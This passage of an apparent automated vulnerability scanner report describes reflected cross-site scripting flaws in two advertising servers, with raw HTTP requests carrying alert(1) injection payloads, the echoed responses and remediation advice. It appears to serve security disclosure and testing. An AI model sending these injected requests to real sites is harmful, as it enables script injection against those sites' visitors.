Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!!$gD!!E))!#CIx!0Q]c!$mX/!!H<)!?5%!)e-O=!wVd.!!6nX!!?^T!%hMd~~~~~=%3Ve=%@S6M.jTN"; uid=uid=6add2924-95ac-11e0-b4d2-43a277710b2b&_hmacv=1&_salt=4204180274&_keyid=k1&_hmac=44aa44fb7ee602e1c39d69fa3dcf95912e945eeb; ih="b!!!!_!'4@g!!!!#=$KA3!'s4e!!!!%=)!]+!)AU6!!!!#='htn!)AU7!!!!#=(1IK!*09R!!!!#=)![q!-5BI!!!!$=$J^*!->hZ!!!!#=(6NE!-fi6!!!!#=(8L5!-fiH!!!!#=(8HV!-ru2!!!!#=$K9.!.#:A!!!!#=$L#)!.#:D!!!!#='htp!.`.U!!!!#='htS!.g(t!!!!#=)!a#!.g.)!!!!%=)!^q!/!O+!!!!#=(aKx!/'y^!!!!#=(1IG!/+NP!!!!#=(aOb!/JVV!!!!'='jNd!/[[9!!!!#=$L5r!/cnt!!!!$=)!Zg!/noe!!!!$=%=]O!0)2c!!!!#=$Jsh!0QGc!!!!#=$IeW!0Q]c!!!!#=%3V4!0eUu!!!!#=)Pl$!0eaS!!!!$=$Jui!19x/!!!!%=$L6>!1@m6!!!!$=%3V#!1UC$!!!!#=$G!=!1W47!!!!#=)Pl)!1W4@!!!!#=(1IO!1`)_!!!!#=)![y!1e75!!!!#=%3V6!1qGe!!!!#=%1p'!1wmg!!!!#=)![j!2*,b!!!!#=(h4W!23o_!!!!'=$Ks'!2817!!!!#=$L6.!282@!!!!$=$L5n!29j+!!!!6=$LYE!29j/!!!!7=$LgV!29j6!!!!7=$Lth!2:N8!!!!#=%3UW!2=_P!!!!#=%3Vp!2A@,!!!!#=$Ju6!2GG7!!!!#=$J4M!2L<B!!!!#=(1ID!2N-f!!!!B=$LJ>!2N7y!!!!$=$L=v!2NNL!!!!$=$L6,!2NO)!!!!$=$Ju2!2Y#q!!!!#=(aO]!2Y$+!!!!'=)!c2!2`+,!!!!#='hw!!2gH2!!!!#='i#o!2l>@!!!!#=(aKS!3$a2!!!!#=)5nT"; 
pv1="b!!!!/!$)FX!!#/o!!L9x!0eaS!%iUa!#a.5!?5%!'kH#8![:Z-!#5k@!'yJf~~~~~~=$Jui~~!!wjV!!#6W!#8='!/noe!#bl)!!!!$!?5%!'k>u7![:Z-!$>',!$FVq~~~~~~=%=]O=*PGYM.jTN!$'!_!$5*F!$xFj!1W47!%asf!!!!$!?5%!'2po7!?vQ,!'o0x~~~~~~~=)Pl)=+N8]!!!([!!3^d!!E)$!$XwX!/+NP!#bCp!'9kN!?5%!(glx6!w1K*!%4=%!$u!@!$F%,~~~~~=(aOb=/%Zq~!#0:.!!#6W!$a+)!2*,b!%vIB!!!!$!?5%!$Tey-![:Z-!':kx!(36D~~~~~~=(h4W~~!$$eQ!!#6W!$a+)!2*,b!%vIB!!!!$!?5%!$Tey-![:Z-!':kx!(36D~~~~~~=(h4W~~!#aQ9!!E)(!$XwW!1wmg!%+@A!!!%%!?5%!)e#I<!w1K*!%4=*!#(jY!'+(>~~~~~=)![p=-6G!~!#3yC#[gVp!$glF!1`)_!%bq`!!!!$!?5%!)e#I<!w1K*!',LB!$iom!'pCX~~~~~=)![y=-6G,~!$3Gv!,swX!#7V=!3$a2!%yFx!!!!$!?5%!$qF>1!wVd.!$:F,!#gj!!(6r7~~~~~=)5nT=-IX_~!$3Gx!,swX!#7V=!3$a2!%yFx!!!!$!?5%!$qF>1!wVd.!$:F,!#gj!!(6r7~~~~~=)5nT=-IX_~!$3H!!,swX!#7V=!3$a2!%yFx!!!!$!?5%!$qF>1!wVd.!$:F,!#gj!!(6r7~~~~~=)5nT=-IX_~!$3H$!,swX!#7V=!3$a2!%yFx!!!!$!?5%!$qF>1!wVd.!$:F,!#gj!!(6r7~~~~~=)5nT=-IX_~"; bh="b!!!%1!!!?J!!!!)='htq!!(1-!!!!-=(6NF!!*10!!!!$=(5yj!!*lZ!!!!#=$Wj6!!*oY!!!!'=(5yj!!,WM!!!!#=$Wj6!!-?2!!!!+=(5yj!!..X!!!!'=$L=p!!/GK!!!!-=(6NF!!/GR!!!!-=(6NF!!/Ju!!!!$='htq!!/K$!!!!(=(6NF!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2*J!!!!#=%=bB!!3ba!!!!%='7bV!!4F0!!!!(=(6NF!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=):+(!!J<J!!!!.=(6NF!!J<K!!!!.=(6NF!!J<O!!!!,=(6NF!!J<S!!!!.=(6NF!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!OfW!!!!$=)DMq!!PKh!!!!#=$G$!!!PL)!!!!#=$G$!!!PL`!!!!$=$G$!!!Rp$!!!!#='oUr!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!Zwb!!!!'=(5yj!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!.=(6NF!!j,.!!<NC=):+(!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!mL?!!!!#=%=pu!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!t^6!!!!%=!Tiu!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#-B#!!!!#=$G#-!#.g1!!!!$=(bh!!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0[r!!!!#=#32s!#16I!!<NC=):+(!#2%T!!!!%=)YC>!#2.i!!!!#=$G$!!#2g8!!!!#=%=bG!#2lt!!!!#=(BUr!#2m_!!!!#=(BV(!#2m`!!!!#=(C2b!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#8*]!!!!#=$G]3!#8>+!!!!#=!
i9S!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#<v4!!!!#=(BU+!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#?gk!!!!#=(BV@!#C@M!!!!#=!iK@!#D`%!!!!,=(6NF!#Dri!!!!$=)YC=!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!,=(6NF!#MTF!!!!'=%=]S!#MTH!!!!.=(6NF!#MTI!!!!.=(6NF!#MTJ!!!!.=(6NF!#Nyi!!!!#=!eq^!#O@L!!<NC=):+(!#O@M!!<NC=):+(!#O_8!!!!'=$$NV!#QZ6!!!!#=(is%!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!$=)!]+!#Sq>!!!!#='>m<!#T^F!!!!#=!yv!!#TnE!!!!$=(6NF!#UDQ!!!!.=(6NF!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#XF5!!!!#=%=bI!#Ym8!!!!#=(C1>!#]%`!!!!$='i$P!#]*j!!!!$=)YGq!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Up!!!!$=(6NF!#]Uq!!!!$=(6NF!#]Uy!!!!$=(6NF!#]Z!!!!!*=(5yj!#]Z#!!!!'=(5yj!#]w)!!!!,=(6NF!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^F1!!!!#=(C1Q!#^F2!!!!#=(BUC!#^cm!!!!#=(6NF!#^d6!!!!$='i$P!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-Z!!!!'=(6NF!#`-[!!!!'=(6NF!#`cS!!!!#=%id8!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#aPZ!!!!%=(C2c!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b8-!!!!#=(6NF!#b86!!!!#=(6NF!#b87!!!!#=(6NF!#b8:!!!!#=(6NF!#b8F!!!!#=(6NF!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#biv!!!!#=!iK0!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8m!!!!*=(5yj!#c8p!!!!*=(5yj!#c@(!!!!#=(6NF!#c@[!!!!#=(BU+!#cmG!!!!#=(BU+!#dCX!!!!%=!c>6!#dWf!!!!#=#mS:!#eDE!!!!$=)YX/!#eSD!!!!(=$_d[!#fFG!!!!#=#T_g!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g)H!!!!#=(6NF!#g)O!!!!#=(6NF!#h.N!!!!#=#M8b!#mP$!!!!$=(C6j!#nci!!!!#=$_di!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#pO,!!!!#=(CAZ!#q+A!!!!$=(6NF!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#qe/!!!!%=(bf8!#qe0!!!!%=(bf8!#r-[!!!!#=!c8Z!#rj7!!!!#=(BU+!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#sDa!!!!#=(Gfu!#s`D!!!!$=(Gfu!#s`L!!!!#=(BU+!#s`N!!!!#=(BU+!#s`O!!!!#=(BU+!#s`P!!!!#=(BU+!#sa7!!!!#=(Gfu!#sa^!!!!#=(Gfu!#
sak!!!!#=(Gfu!#sfb!!!!#=(Gfu!#slj!!!!#=#T_f!#t>.!!!!#=(C6j!#t?S!!!!#=(bpR!#tM)!!!!%=(6NF!#tM*!!!!$=$Ju9!#uQC!!!!+='htq!#uY<!!!!#=!yv$!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#vC^!!!!$=(6NF!#w3I!!!!#=(bX/!#w7%!!!!#=(bX/!#wUS!!!!,=(6V[!#wYG!!!!$=(bxK!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!#xtJ!!!!#=(C1t!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$!]L!!!!#=(6?f!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#R7!!!!$=(6NF!$#X4!!!!#=#%VO!$#yu!!!!,=(6NF!$$I]!!!!#=(6NF!$$Ig!!!!#=(6NF!$$Il!!!!#=(6NF!$$K<!!!!#=#$.g!$'$#!!!!#=(0.`!$'/S!!!!#=#mS:!$'?p!!!!#=(Gfu!$'A4!!!!#=(Gfu!$'A6!!!!#=(Gfu!$'AB!!!!#=(Gfu!$'AJ!!!!#=(Gfu!$'B'!!!!#=(Gfu!$'B)!!!!#=(Gfu!$(:q!!!!#=$Fss!$(Gt!!!!(=(6NF!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$+VB!!!!#=(1IG!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,_+!!!!%=(C2d!$,gE!!!!$=!iQt!$-'0!!!!#='i$,!$-rx!!!!#=$GXw!$.#F!!!!%=)I#r!$._W!!!!#='i+,!$0Tw!!!!#=(6NF!$0V+!!!!#='htq!$2?y!!!!#=(6?g!$35v!!!!#=(BU="; BX=edn6q5d6t078b&b=4&s=k0&t=135

Response

HTTP/1.1 200 OK
Date: Tue, 28 Jun 2011 01:30:05 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Tue, 28 Jun 2011 01:30:05 GMT
Pragma: no-cache
Content-Length: 4724
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...
<a href="http://ad.yieldmanager.com/imageclick?Z=300x250&cda38"><script>alert(1)</script>a85a84a684d=1&s=1887835&_salt=450222217&t=2" target="_parent">
...[SNIP]...

1.139. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a double-quoted JavaScript string literal inside an inline script in the HTML response (the rm_url assignment shown below). The payload 329c7"-alert(1)-"2dd5a4072bd was submitted as the name of an arbitrarily supplied request parameter and was echoed unmodified; its double quote terminates the string literal, so -alert(1)- is parsed and evaluated as JavaScript when the page loads.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the sink is the parameter name rather than a value, no particular parameter has to exist: any crafted query string appended to /st reaches it.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, the value must be serialised as a JavaScript string literal (JSON-encoded, with <, > and & additionally escaped as \u003c, \u003e and \u0026 so the literal can never close the enclosing <script> element) rather than concatenated between quote characters.

Request

GET /st?ad_type=iframe&ad_size=300x250&section=1887835&329c7"-alert(1)-"2dd5a4072bd=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://d.tradex.openx.com/afr.php?refresh=40&zoneid=5517&cb=INSERT_RANDOM_NUMBER_HERE&loc=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!!$gD!!E))!#CIx!0Q]c!$mX/!!H<)!?5%!)e-O=!wVd.!!6nX!!?^T!%hMd~~~~~=%3Ve=%@S6M.jTN"; uid=uid=6add2924-95ac-11e0-b4d2-43a277710b2b&_hmacv=1&_salt=4204180274&_keyid=k1&_hmac=44aa44fb7ee602e1c39d69fa3dcf95912e945eeb; ih="b!!!!_!'4@g!!!!#=$KA3!'s4e!!!!%=)!]+!)AU6!!!!#='htn!)AU7!!!!#=(1IK!*09R!!!!#=)![q!-5BI!!!!$=$J^*!->hZ!!!!#=(6NE!-fi6!!!!#=(8L5!-fiH!!!!#=(8HV!-ru2!!!!#=$K9.!.#:A!!!!#=$L#)!.#:D!!!!#='htp!.`.U!!!!#='htS!.g(t!!!!#=)!a#!.g.)!!!!%=)!^q!/!O+!!!!#=(aKx!/'y^!!!!#=(1IG!/+NP!!!!#=(aOb!/JVV!!!!'='jNd!/[[9!!!!#=$L5r!/cnt!!!!$=)!Zg!/noe!!!!$=%=]O!0)2c!!!!#=$Jsh!0QGc!!!!#=$IeW!0Q]c!!!!#=%3V4!0eUu!!!!#=)Pl$!0eaS!!!!$=$Jui!19x/!!!!%=$L6>!1@m6!!!!$=%3V#!1UC$!!!!#=$G!=!1W47!!!!#=)Pl)!1W4@!!!!#=(1IO!1`)_!!!!#=)![y!1e75!!!!#=%3V6!1qGe!!!!#=%1p'!1wmg!!!!#=)![j!2*,b!!!!#=(h4W!23o_!!!!'=$Ks'!2817!!!!#=$L6.!282@!!!!$=$L5n!29j+!!!!6=$LYE!29j/!!!!7=$LgV!29j6!!!!7=$Lth!2:N8!!!!#=%3UW!2=_P!!!!#=%3Vp!2A@,!!!!#=$Ju6!2GG7!!!!#=$J4M!2L<B!!!!#=(1ID!2N-f!!!!B=$LJ>!2N7y!!!!$=$L=v!2NNL!!!!$=$L6,!2NO)!!!!$=$Ju2!2Y#q!!!!#=(aO]!2Y$+!!!!'=)!c2!2`+,!!!!#='hw!!2gH2!!!!#='i#o!2l>@!!!!#=(aKS!3$a2!!!!#=)5nT"; 
pv1="b!!!!/!$)FX!!#/o!!L9x!0eaS!%iUa!#a.5!?5%!'kH#8![:Z-!#5k@!'yJf~~~~~~=$Jui~~!!wjV!!#6W!#8='!/noe!#bl)!!!!$!?5%!'k>u7![:Z-!$>',!$FVq~~~~~~=%=]O=*PGYM.jTN!$'!_!$5*F!$xFj!1W47!%asf!!!!$!?5%!'2po7!?vQ,!'o0x~~~~~~~=)Pl)=+N8]!!!([!!3^d!!E)$!$XwX!/+NP!#bCp!'9kN!?5%!(glx6!w1K*!%4=%!$u!@!$F%,~~~~~=(aOb=/%Zq~!#0:.!!#6W!$a+)!2*,b!%vIB!!!!$!?5%!$Tey-![:Z-!':kx!(36D~~~~~~=(h4W~~!$$eQ!!#6W!$a+)!2*,b!%vIB!!!!$!?5%!$Tey-![:Z-!':kx!(36D~~~~~~=(h4W~~!#aQ9!!E)(!$XwW!1wmg!%+@A!!!%%!?5%!)e#I<!w1K*!%4=*!#(jY!'+(>~~~~~=)![p=-6G!~!#3yC#[gVp!$glF!1`)_!%bq`!!!!$!?5%!)e#I<!w1K*!',LB!$iom!'pCX~~~~~=)![y=-6G,~!$3Gv!,swX!#7V=!3$a2!%yFx!!!!$!?5%!$qF>1!wVd.!$:F,!#gj!!(6r7~~~~~=)5nT=-IX_~!$3Gx!,swX!#7V=!3$a2!%yFx!!!!$!?5%!$qF>1!wVd.!$:F,!#gj!!(6r7~~~~~=)5nT=-IX_~!$3H!!,swX!#7V=!3$a2!%yFx!!!!$!?5%!$qF>1!wVd.!$:F,!#gj!!(6r7~~~~~=)5nT=-IX_~!$3H$!,swX!#7V=!3$a2!%yFx!!!!$!?5%!$qF>1!wVd.!$:F,!#gj!!(6r7~~~~~=)5nT=-IX_~"; bh="b!!!%1!!!?J!!!!)='htq!!(1-!!!!-=(6NF!!*10!!!!$=(5yj!!*lZ!!!!#=$Wj6!!*oY!!!!'=(5yj!!,WM!!!!#=$Wj6!!-?2!!!!+=(5yj!!..X!!!!'=$L=p!!/GK!!!!-=(6NF!!/GR!!!!-=(6NF!!/Ju!!!!$='htq!!/K$!!!!(=(6NF!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2*J!!!!#=%=bB!!3ba!!!!%='7bV!!4F0!!!!(=(6NF!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=):+(!!J<J!!!!.=(6NF!!J<K!!!!.=(6NF!!J<O!!!!,=(6NF!!J<S!!!!.=(6NF!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!OfW!!!!$=)DMq!!PKh!!!!#=$G$!!!PL)!!!!#=$G$!!!PL`!!!!$=$G$!!!Rp$!!!!#='oUr!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!Zwb!!!!'=(5yj!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!.=(6NF!!j,.!!<NC=):+(!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!mL?!!!!#=%=pu!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!t^6!!!!%=!Tiu!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#-B#!!!!#=$G#-!#.g1!!!!$=(bh!!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0[r!!!!#=#32s!#16I!!<NC=):+(!#2%T!!!!%=)YC>!#2.i!!!!#=$G$!!#2g8!!!!#=%=bG!#2lt!!!!#=(BUr!#2m_!!!!#=(BV(!#2m`!!!!#=(C2b!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#8*]!!!!#=$G]3!#8>+!!!!#=!
i9S!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#<v4!!!!#=(BU+!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#?gk!!!!#=(BV@!#C@M!!!!#=!iK@!#D`%!!!!,=(6NF!#Dri!!!!$=)YC=!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!,=(6NF!#MTF!!!!'=%=]S!#MTH!!!!.=(6NF!#MTI!!!!.=(6NF!#MTJ!!!!.=(6NF!#Nyi!!!!#=!eq^!#O@L!!<NC=):+(!#O@M!!<NC=):+(!#O_8!!!!'=$$NV!#QZ6!!!!#=(is%!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!$=)!]+!#Sq>!!!!#='>m<!#T^F!!!!#=!yv!!#TnE!!!!$=(6NF!#UDQ!!!!.=(6NF!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#XF5!!!!#=%=bI!#Ym8!!!!#=(C1>!#]%`!!!!$='i$P!#]*j!!!!$=)YGq!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Up!!!!$=(6NF!#]Uq!!!!$=(6NF!#]Uy!!!!$=(6NF!#]Z!!!!!*=(5yj!#]Z#!!!!'=(5yj!#]w)!!!!,=(6NF!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^F1!!!!#=(C1Q!#^F2!!!!#=(BUC!#^cm!!!!#=(6NF!#^d6!!!!$='i$P!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-Z!!!!'=(6NF!#`-[!!!!'=(6NF!#`cS!!!!#=%id8!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#aPZ!!!!%=(C2c!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b8-!!!!#=(6NF!#b86!!!!#=(6NF!#b87!!!!#=(6NF!#b8:!!!!#=(6NF!#b8F!!!!#=(6NF!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#biv!!!!#=!iK0!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8m!!!!*=(5yj!#c8p!!!!*=(5yj!#c@(!!!!#=(6NF!#c@[!!!!#=(BU+!#cmG!!!!#=(BU+!#dCX!!!!%=!c>6!#dWf!!!!#=#mS:!#eDE!!!!$=)YX/!#eSD!!!!(=$_d[!#fFG!!!!#=#T_g!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g)H!!!!#=(6NF!#g)O!!!!#=(6NF!#h.N!!!!#=#M8b!#mP$!!!!$=(C6j!#nci!!!!#=$_di!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#pO,!!!!#=(CAZ!#q+A!!!!$=(6NF!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#qe/!!!!%=(bf8!#qe0!!!!%=(bf8!#r-[!!!!#=!c8Z!#rj7!!!!#=(BU+!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#sDa!!!!#=(Gfu!#s`D!!!!$=(Gfu!#s`L!!!!#=(BU+!#s`N!!!!#=(BU+!#s`O!!!!#=(BU+!#s`P!!!!#=(BU+!#sa7!!!!#=(Gfu!#sa^!!!!#=(Gfu!#
sak!!!!#=(Gfu!#sfb!!!!#=(Gfu!#slj!!!!#=#T_f!#t>.!!!!#=(C6j!#t?S!!!!#=(bpR!#tM)!!!!%=(6NF!#tM*!!!!$=$Ju9!#uQC!!!!+='htq!#uY<!!!!#=!yv$!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#vC^!!!!$=(6NF!#w3I!!!!#=(bX/!#w7%!!!!#=(bX/!#wUS!!!!,=(6V[!#wYG!!!!$=(bxK!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!#xtJ!!!!#=(C1t!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$!]L!!!!#=(6?f!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#R7!!!!$=(6NF!$#X4!!!!#=#%VO!$#yu!!!!,=(6NF!$$I]!!!!#=(6NF!$$Ig!!!!#=(6NF!$$Il!!!!#=(6NF!$$K<!!!!#=#$.g!$'$#!!!!#=(0.`!$'/S!!!!#=#mS:!$'?p!!!!#=(Gfu!$'A4!!!!#=(Gfu!$'A6!!!!#=(Gfu!$'AB!!!!#=(Gfu!$'AJ!!!!#=(Gfu!$'B'!!!!#=(Gfu!$'B)!!!!#=(Gfu!$(:q!!!!#=$Fss!$(Gt!!!!(=(6NF!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$+VB!!!!#=(1IG!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,_+!!!!%=(C2d!$,gE!!!!$=!iQt!$-'0!!!!#='i$,!$-rx!!!!#=$GXw!$.#F!!!!%=)I#r!$._W!!!!#='i+,!$0Tw!!!!#=(6NF!$0V+!!!!#='htq!$2?y!!!!#=(6?g!$35v!!!!#=(BU="; BX=edn6q5d6t078b&b=4&s=k0&t=135

Response

HTTP/1.1 200 OK
Date: Tue, 28 Jun 2011 01:30:08 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Tue, 28 Jun 2011 01:30:08 GMT
Pragma: no-cache
Content-Length: 4682
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ad.yieldmanager.com/imp?329c7"-alert(1)-"2dd5a4072bd=1&Z=300x250&s=1887835&_salt=2827879769";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new A
...[SNIP]...

1.140. http://adadvisor.net/adscores/g.js [_cx parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adadvisor.net
Path:   /adscores/g.js

Issue detail

The value of the _cx request parameter is copied into the double-quoted JavaScript string passed to document.write() in the g.js response; within that string it becomes the single-quoted value of mm_context_flag. The payload 66f26"-alert(1)-"d2f5504bbaf was submitted in the _cx parameter and was echoed unmodified; its double quote terminates the outer document.write() string, so -alert(1)- is evaluated when the script runs.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The response is served as application/javascript, so the injected code executes in the origin of whichever page includes g.js with an attacker-influenced _cx value (a browser that honours the declared Content-Type does not render a direct request to this URL as HTML).

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, the value must be serialised as a JavaScript string literal (JSON-encoded, with <, > and & additionally escaped as \u003c, \u003e and \u0026) rather than concatenated between quote characters; here the value is nested inside a second string literal, so both layers must be encoded.

Request

GET /adscores/g.js?sid=9263342628&_ri=1309228166&_cx=00166f26"-alert(1)-"d2f5504bbaf HTTP/1.1
Host: adadvisor.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHAA4GIkAAAAAAPReJQAAAAAAAgAEAQIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAAAZ.jAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAIAccl2mPwAAAAAAAAAAAACAHHJdpj8AAAAAAAAAAAAAgBxyXaY.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAcf4k7BSFSCrL5KgAWIIvj0.SRpNsR3m0OP5t-AAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D1010928057%26r%3D0%26s%3D1887835,70b445e8-a12e-11e0-b361-cf235a3adb18
